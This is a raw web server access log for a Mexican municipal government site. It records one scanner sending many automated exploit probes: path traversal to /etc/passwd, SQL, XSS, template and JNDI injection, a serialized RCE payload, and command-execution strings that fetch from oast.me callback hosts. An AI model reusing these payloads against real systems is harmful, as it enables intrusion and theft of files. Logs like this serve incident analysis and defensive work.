Chrome/128.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:11:41:50 -0600] "GET / HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:11:41:54 -0600] "GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:11:41:56 -0600] "GET /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 154.49.207.220 - - [01/Feb/2025:11:53:45 -0600] "GET / HTTP/2.0" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Zoom 3.6.0; rv:11.0) like Gecko" mail.chocholayucatan.gob.mx 192.185.131.128 66.249.92.168 - - [01/Feb/2025:12:23:02 -0600] "GET / HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:29:30 -0600] "GET /document.php?modulepart=project&file=../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:29:32 -0600] "GET /tshirtecommerce/fonts.php?name=2&type=./../index.php HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/115.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:29:33 -0600] "GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15-620" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:29:39 -0600] "GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22certutil%20-urlcache%20-split%20-f%20http://cudo29mjalo72u293ingr739rpet88h6j.oast.me%22%29%7D__::.x/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.16.12 (KHTML, like Gecko) Version/17.7.92 Safari/617.16.12" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:29:39 -0600] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:29:49 -0600] "GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/ilJW.css HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:42:10 -0600] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.0) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:42:22 -0600] "GET /boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:42:22 -0600] "GET /board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:42:27 -0600] "GET /vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_9) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.4 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 51.8.102.197 - - [01/Feb/2025:12:43:28 -0600] "GET /robots.txt HTTP/2.0" 200 90 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot" www.chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:52:59 -0600] "GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.4.16" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:16:19 -0600] "GET /RestAPI/ImportTechnicians HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.23" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:16:23 -0600] "GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:16:24 -0600] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:16:24 -0600] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.21" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:16:30 -0600] "GET /front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:24:39 -0600] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:08 -0600] "GET /src/redirect.php?plugins[]=../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:09 -0600] "GET /lab.html?vpath=//interact.sh HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:09 -0600] "GET /v1/folder?path=%2F HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:10 -0600] "GET /?search==%00{.cookie|ZLRzG3|value%3dCVE-2014-6287.} HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:10 -0600] "GET /api/moduleInformation HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:13 -0600] "GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:14 -0600] "GET /api/get_device_details HTTP/1.1" 200 25712 "https://chocholayucatan.gob.mx/assets/base/home.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.9.17" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:16 -0600] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:36:05 -0600] "GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:36:06 -0600] "GET /version.web HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.27" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:36:06 -0600] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:36:06 -0600] "GET /admin/airflow/code?root&dag_id=example_passing_params_via_test_command HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_8; en) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.2 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:36:07 -0600] "GET /wlsecurity.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:36:09 -0600] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cudo29mjalo72u293ingg8imfx7y1emu3.oast.me') HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:36:09 -0600] "GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:36:11 -0600] "GET /asd/../../../../../../../../etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:54:19 -0600] "GET /nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:54:22 -0600] "GET /...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:54:23 -0600] "GET /nonauth/addCertException.cs?dest=VGVzdA0KQ1JMRjo%3d HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:54:24 -0600] "GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:54:25 -0600] "GET /nonauth/expiration.cs?dest=VGVzdA0KQ1JMRjo%3d HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:54:25 -0600] "GET /....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:54:28 -0600] "GET /nonauth/guestConfirm.cs?dest=Cgo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4%3d HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:05:03 -0600] "GET /api/Image/withpath/C:%5CWindows%5Cwin.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:14:31 -0600] "GET /index.php?download=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.0 ) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:14:32 -0600] "GET /SetupWizard.aspx/asWMDOXCHf HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:14:33 -0600] "DELETE /druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2fcudo29mjalo72u293ing3h7nh1ycugynd.oast.me%2ftea%7d HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:14:34 -0600] "GET /dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:14:34 -0600] "GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:14:35 -0600] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:48:20 -0600] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.20" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:48:22 -0600] "GET / HTTP/1.1" 200 87208 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:48:23 -0600] "GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:48:24 -0600] "GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:48:24 -0600] "GET /api/snapshots/:key HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:48:25 -0600] "GET /client/index.php%3F.php/gsb/users.php HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:03:42 -0600] "GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:03:44 -0600] "GET /current_config/passwd HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:12:50 -0600] "GET /logfile?d=crossdomain.xml HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/15.0.0 Version/17.3.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:16:55 -0600] "GET /assets/../package.json HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:23:59 -0600] "GET /prweb/PRAuth/app/default/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.27" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:23:59 -0600] "GET /bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1> HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.2.27" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:01 -0600] "GET /jeecg-boot/sys/user/querySysUser?username=admin HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:02 -0600] "GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:02 -0600] "GET /?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:03 -0600] "GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:04 -0600] "GET /web_cste/cgi-bin/product.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.2.21" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:05 -0600] "GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:07 -0600] "GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:19 -0600] "GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:44:44 -0600] "GET /lang/log/httpd.log HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:44:47 -0600] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (X11; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:44:51 -0600] "GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.18" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:55:47 -0600] "GET /XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.14" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:55:49 -0600] "GET /login/../../../etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.19" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:55:54 -0600] "GET /.%00./.%00./etc/passwd HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:24:26 -0600] "GET /static/../../../a/../../../../etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.27" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:24:29 -0600] "GET /wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)> HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:52 -0600] "GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:53 -0600] "GET /cors_proxy/https://oast.me/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15" 